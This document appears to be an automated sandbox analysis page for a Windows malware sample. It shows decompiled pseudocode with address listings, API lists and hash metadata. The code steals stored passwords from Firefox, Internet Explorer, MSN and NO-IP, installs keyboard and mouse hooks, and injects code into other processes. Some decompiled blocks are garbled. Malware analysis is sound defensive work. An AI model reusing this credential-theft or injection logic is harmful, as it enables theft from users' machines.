									_t274 = 0xb;
									do {
										_push(0);
										_push(0);
										_t274 = _t274 - 1;
										__eflags = _t274;
									} while (_t274 != 0);
									_push(0x1000);
									E00403418(0x40bb04);
									_push(_t327);
									_push(0x40c0c4);
									_push( *[fs:eax]);
									 *[fs:eax] = _t329;
									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
									_t266 = _t92;
									_t93 = GetLastError();
									__eflags = _t93 - 0xb7;
									if(_t93 != 0xb7) {
										CloseHandle(_t266); // executed
									} else {
										CloseHandle(_t266);
										Sleep(0x2ee0);
									}
									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
									_t267 = _t95;
									__eflags = GetLastError() - 0xb7;
									if(__eflags != 0) {
										CloseHandle(_t267);
										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
										_t268 = _t98;
										__eflags = GetLastError() - 0xb7;
										if(__eflags != 0) {
											CloseHandle(_t268);
											L27:
											E004013A4(1,  &_v80);
											_t287 = "Restart";
											E00401E94(_v80, "Restart");
											if(__eflags != 0) {
												Sleep(0x3e8); // executed
											}
											E00404604(_t274, __eflags);
											E0040491C();
											E0040B118(_t287, _t320, _t323);
											_t108 =  *0x40d204; // 0x40e8f8
											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
											_t269 = _t111;
											_t112 = GetLastError();
											__eflags = _t112 - 0xb7;
											if(_t112 != 0xb7) {
												CloseHandle(_t269); // executed
											} else {
												CloseHandle(_t269);
												Sleep(0x3e8);
												_t136 =  *0x40d204; // 0x40e8f8
												_t269 = E00403568(0, 0, E00401F48( *_t136));
												_t140 = GetLastError();
												__eflags = _t140 - 0xb7;
												if(_t140 != 0xb7) {
													CloseHandle(_t269);
												} else {
													CloseHandle(_t269);
													Sleep(0x3e8);
													_t143 =  *0x40d204; // 0x40e8f8
													_t269 = E00403568(0, 0, E00401F48( *_t143));
													_t147 = GetLastError();
													__eflags = _t147 - 0xb7;
													if(_t147 != 0xb7) {
														CloseHandle(_t269);
													} else {
														CloseHandle(_t269);
														Sleep(0x3e8);
														_t150 =  *0x40d204; // 0x40e8f8
														_t269 = E00403568(0, 0, E00401F48( *_t150));
														_t154 = GetLastError();
														__eflags = _t154 - 0xb7;
														if(_t154 != 0xb7) {
															CloseHandle(_t269);
														} else {
															ExitProcess(0);
														}
													}
												}
											}
											__eflags =  *((char*)( *0x40d1dc)) - 1;
											if( *((char*)( *0x40d1dc)) != 1) {
												__eflags = 0;
												E004013A4(0, 0x40f1e8);
											} else {
												E004013A4(0,  &_v88);
												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
												E00401B14(0x40f1e8, _v84);
											}
											E00406008( &_v92);
											E00401D58( &_v92, "XX--XX--XX.txt");
											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
											_t123 =  *0x40d214; // 0x40e8f4
											__eflags =  *_t123 - 1;
											if(__eflags == 0) {
												E0040B7FC(_t269, _t320, _t323, __eflags);
												Sleep(0x3e8); // executed
											}
											E0040B3C0(_t269, _t274, _t320, _t323); // executed
											L44:
											__eflags = 0;
											_pop(_t291);
											 *[fs:eax] = _t291;
											_push(0x40c0cb);
											return E00401AE4( &_v92, 0x12);
										}
										CloseHandle(_t268);
										_t157 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
										_t160 =  *0x40e670; // 0x400000
										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
										while(1) {
											_t163 = E0040BA84(__eflags);
											__eflags = _t163;
											if(_t163 != 0) {
												break;
											}
											E00405918();
										}
										ExitProcess(0);
										goto L27;
									}
									CloseHandle(_t267);
									E00409AD4( &_v24, _t267, _t323, __eflags);
									E00401B14(0x40f1ec, _v24);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v28);
										E00401D58( &_v28, "NOIP.abc");
										_pop(_t283);
										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
									}
									E00409D28( &_v32, _t267, _t320, _t323);
									_t297 = _v32;
									E00401B14(0x40f1ec, _v32);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v36);
										E00401D58( &_v36, "MSN.abc");
										_t297 =  *0x40f1ec;
										_pop(_t282);
										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
									}
									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
									E00401B14(0x40f1ec, _v40);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v44);
										E00401D58( &_v44, "FIREFOX.abc");
										_pop(_t281);
										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
									}
									E00409A84( &_v48);
									E00401B14(0x40f1ec, _v48);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v52);
										E00401D58( &_v52, "IELOGIN.abc");
										_pop(_t280);
										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
									}
									E00409A90( &_v56);
									E00401B14(0x40f1ec, _v56);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v60);
										E00401D58( &_v60, "IEPASS.abc");
										_pop(_t279);
										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
									}
									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
									E00401B14(0x40f1ec, _v64);
									__eflags =  *0x40f1ec;
									if(__eflags != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v68);
										E00401D58( &_v68, "IEAUTO.abc");
										_pop(_t278);
										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
									}
									E00409AB8( &_v72, _t320, _t323, __eflags);
									E00401B14(0x40f1ec, _v72);
									__eflags =  *0x40f1ec;
									if( *0x40f1ec != 0) {
										_push(E00401D50( *0x40f1ec));
										E00406008( &_v76);
										E00401D58( &_v76, "IEWEB.abc");
										_pop(_t277);
										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
									}
									goto L44;
								}
								_t325 = _t71 >> 1;
								goto L67;
							}
							_t261 =  *_t322;
							_t322 = _t322 - 0xfffffffc;
							asm("adc ebx, ebx");
							if(_t322 < 0) {
								goto L62;
							}
							L56:
							_t65 = _t65 - 1;
							_t259 = _t261 + _t261;
							if(_t259 == 0) {
								_t259 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t260 = _t259 + _t259;
							if(_t260 == 0) {
								_t260 =  *_t322;
								_t322 = _t322 - 0xfffffffc;
								asm("adc ebx, ebx");
							}
							asm("adc eax, eax");
							_t261 = _t260 + _t260;
							_t332 = _t261;
							if(_t332 >= 0) {
								goto L56;
							}
						}
						L47:
						_t259 = _t259 + _t259;
						__eflags = _t259;
					} while (_t259 != 0);
				}
			}
























































































                                    0x00455c10
                                    0x00455c10
                                    0x00455c10
                                    0x00455c11
                                    0x00455c16
                                    0x00455c16
                                    0x00455c1c
                                    0x00455c1d
                                    0x00455c32
                                    0x00455c32
                                    0x00455c34
                                    0x00455c37
                                    0x00455c39
                                    0x00455c39
                                    0x00455c28
                                    0x00455c2a
                                    0x00455c2b
                                    0x00455c2d
                                    0x00455c2d
                                    0x00000000
                                    0x00455c2d
                                    0x00455c3b
                                    0x00455c40
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c51
                                    0x00455c51
                                    0x00455c7b
                                    0x00455c7b
                                    0x00455c7d
                                    0x00455c7d
                                    0x00455c80
                                    0x00455c93
                                    0x00455c93
                                    0x00455c95
                                    0x00455c97
                                    0x00455c99
                                    0x00455c9c
                                    0x00455c9c
                                    0x00455c9e
                                    0x00455c9e
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6e
                                    0x00455c70
                                    0x00455c72
                                    0x00455c75
                                    0x00455c75
                                    0x00455c77
                                    0x00455ccd
                                    0x00455ccd
                                    0x00455cd3
                                    0x00455cd6
                                    0x00455cd9
                                    0x00455cdc
                                    0x00455cec
                                    0x00455cec
                                    0x00455cee
                                    0x00455cf1
                                    0x00455cf3
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cfb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00455cde
                                    0x00455cde
                                    0x00455cde
                                    0x00455ce0
                                    0x00455ce1
                                    0x00455ce3
                                    0x00455ce4
                                    0x00455ce4
                                    0x00455ce4
                                    0x00000000
                                    0x00455ce7
                                    0x00455ca0
                                    0x00455ca1
                                    0x00455ca1
                                    0x00455ca3
                                    0x00455ca5
                                    0x00455ca7
                                    0x00455caa
                                    0x00455caa
                                    0x00455cac
                                    0x00000000
                                    0x00455cae
                                    0x00000000
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cb0
                                    0x00455cb2
                                    0x00455cb4
                                    0x00455cb7
                                    0x00455cb7
                                    0x00455cb9
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbf
                                    0x00000000
                                    0x00000000
                                    0x00455cc1
                                    0x00455cc3
                                    0x00455cc3
                                    0x00455cc6
                                    0x00455cc6
                                    0x00455cca
                                    0x00455cca
                                    0x00000000
                                    0x00455cca
                                    0x00455cac
                                    0x00455c85
                                    0x00455c87
                                    0x00455c88
                                    0x00455c88
                                    0x00455c8b
                                    0x00455d02
                                    0x00455d03
                                    0x00455d05
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0c
                                    0x00455d0f
                                    0x00455d0f
                                    0x00455d13
                                    0x00455d13
                                    0x00455d21
                                    0x00455d2d
                                    0x00455d2f
                                    0x00455d34
                                    0x00455d36
                                    0x00455d36
                                    0x00455d3c
                                    0x00455d3c
                                    0x00455d3e
                                    0x00455d3e
                                    0x00455d40
                                    0x00000000
                                    0x00000000
                                    0x00455d42
                                    0x00455d4c
                                    0x00455d4f
                                    0x00455d4f
                                    0x00455d58
                                    0x00455d59
                                    0x00455d5b
                                    0x00455d5c
                                    0x00455d5c
                                    0x00455d5e
                                    0x00000000
                                    0x00000000
                                    0x00455d64
                                    0x00455d6d
                                    0x00455d6d
                                    0x00455d6f
                                    0x00455d78
                                    0x00455d78
                                    0x00455d71
                                    0x00455d73
                                    0x00455d73
                                    0x00455d59
                                    0x00455d7e
                                    0x00455d84
                                    0x00455d84
                                    0x00455d95
                                    0x00455d97
                                    0x00455d97
                                    0x00455d9d
                                    0x00455da0
                                    0x00455da0
                                    0x00455da0
                                    0x00455da4
                                    0x00455da5
                                    0x00455daa
                                    0x00455dad
                                    0x00455dae
                                    0x00455db2
                                    0x00455db2
                                    0x00455db4
                                    0x00455db4
                                    0x00455db8
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc03
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc2c
                                    0x0040bc31
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004040F4, Relevance: 6.1, APIs: 4, Instructions: 100memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _v8;
				intOrPtr _v12;
				char _v13;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				intOrPtr _v36;
				long _v44;
				void* _v48;
				void* _t38;
				void* _t42;
				void* _t49;
				void* _t55;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr* _t80;

				_t80 = _t79 + 0xffffffd4;
				_v12 = __edx;
				_v8 = __eax;
				_t64 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v48, _t64);
				_push(_t79);
				_push(0x404205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t80;
				_v13 = 0;
				_push(0);
				_push(_v12);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
				_t76 = 0x10000000;
				do {
					_t76 = _t76 + 0x10000;
					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
					_t57 = _t38;
					if(_t57 != 0) {
						VirtualFree(_t57, 0, 0x8000); // executed
						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
						_t57 = _t55;
					}
				} while (_t57 == 0 && _t76 <= 0x30000000);
				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
				_t42 = _v48;
				if(_t42 != 0) {
					_v24 = _t42;
					_v20 = _v36;
					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
					if(_t49 != 0) {
						_v13 = 1;
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E0040420C);
				_t68 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v48, _t68);
			}
























                                    0x004040f7
                                    0x004040fd
                                    0x00404100
                                    0x00404106
                                    0x0040410c
                                    0x00404113
                                    0x00404114
                                    0x00404119
                                    0x0040411c
                                    0x0040411f
                                    0x00404128
                                    0x00404129
                                    0x00404130
                                    0x00404134
                                    0x0040413b
                                    0x0040413d
                                    0x00404142
                                    0x00404142
                                    0x00404159
                                    0x0040415e
                                    0x00404162
                                    0x0040416c
                                    0x00404186
                                    0x0040418b
                                    0x0040418b
                                    0x0040418d
                                    0x004041a5
                                    0x004041aa
                                    0x004041af
                                    0x004041b1
                                    0x004041b7
                                    0x004041c8
                                    0x004041dc
                                    0x004041e3
                                    0x004041e5
                                    0x004041e5
                                    0x004041e3
                                    0x004041eb
                                    0x004041ee
                                    0x004041f1
                                    0x004041f9
                                    0x00404204

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040555C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;

				_t52 = __eflags;
				_t48 = __esi;
				_t47 = __edi;
				_t50 = _t51;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t50);
				_push(0x405607);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_push(_t50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_v8 = 0x100;
				E00402074( &_v12, _v8);
				GetUserNameA(E00401F48(_v12),  &_v8); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
				_push(_v16);
				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
				_pop(_t28);
				E00401E94(_t28, _v20);
				_t45 = 0x4055b2;
				 *[fs:eax] = _t45;
				_push(E0040560E);
				return E00401AE4( &_v20, 3);
			}













                                    0x0040555c
                                    0x0040555c
                                    0x0040555c
                                    0x0040555d
                                    0x00405561
                                    0x00405562
                                    0x00405563
                                    0x00405564
                                    0x00405565
                                    0x00405566
                                    0x00405567
                                    0x0040556a
                                    0x0040556b
                                    0x00405570
                                    0x00405573
                                    0x00405578
                                    0x0040557e
                                    0x00405581
                                    0x00405584
                                    0x00405591
                                    0x004055a3
                                    0x004055aa
                                    0x004055ad
                                    0x004055ca
                                    0x004055d2
                                    0x004055db
                                    0x004055e3
                                    0x004055e4
                                    0x004055ee
                                    0x004055f1
                                    0x004055f4
                                    0x00405606

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403789, Relevance: 3.1, APIs: 2, Instructions: 85memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
				signed char _t26;
				void* _t32;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t46;
				signed int _t49;
				signed char _t55;
				intOrPtr _t58;
				void* _t60;
				signed char* _t61;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;

				_t61 = __edi;
				_t55 = __edx;
				_t49 = __ecx;
				_t48 = __ebx;
				asm("aaa");
				 *__ecx =  *__ecx + __edx;
				_t26 = __eax + 0x00000001 | 0x00000054;
				_push(__ebx);
				if(_t26 == 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					E00401CAC(_t65 - 8, __ebx);
					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
					E00401CAC(_t65 - 0xc, __ebx);
					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
					_pop(_t58);
					 *[fs:eax] = _t58;
					_push(E00403871);
					return E00401AE4(_t65 - 0xc, 2);
				} else {
					_t66 =  *(__esi + 0x67) * 0x61727241;
					if(_t66 < 0) {
						 *_t26 =  *_t26 + _t26;
						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
					}
					asm("adc [eax], al");
					_t43 = _t26 - 1;
					 *_t43 =  *_t43 + _t43;
					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
					 *_t49 =  *_t49 + _t55;
					_push(_t66);
					asm("outsb");
					asm("aaa");
					_t45 = _t43 + 2;
					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
					asm("bound ecx, [ecx+0x6e]");
					asm("outsw");
					asm("adc al, 0x0");
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t61 = _t55;
					_t46 = _t45 + 1;
					 *_t46 =  *_t46 + _t55;
					 *_t46 =  *_t46 + _t46;
					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
					_t60 = 0;
					do {
						_t60 = _t60 + 1;
					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
					return _t60;
				}
			}
















                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x0040378b
                                    0x0040378d
                                    0x0040378f
                                    0x00403790
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869
                                    0x00403792
                                    0x00403792
                                    0x00403799
                                    0x0040379b
                                    0x0040379d
                                    0x0040379d
                                    0x0040379f
                                    0x004037a2
                                    0x004037a3
                                    0x004037a5
                                    0x004037a9
                                    0x004037ab
                                    0x004037ac
                                    0x004037bd
                                    0x004037be
                                    0x004037bf
                                    0x004037c1
                                    0x004037c5
                                    0x004037c8
                                    0x004037ca
                                    0x004037cc
                                    0x004037ce
                                    0x004037d0
                                    0x004037d2
                                    0x004037d4
                                    0x004037d5
                                    0x004037d7
                                    0x004037d9
                                    0x004037dc
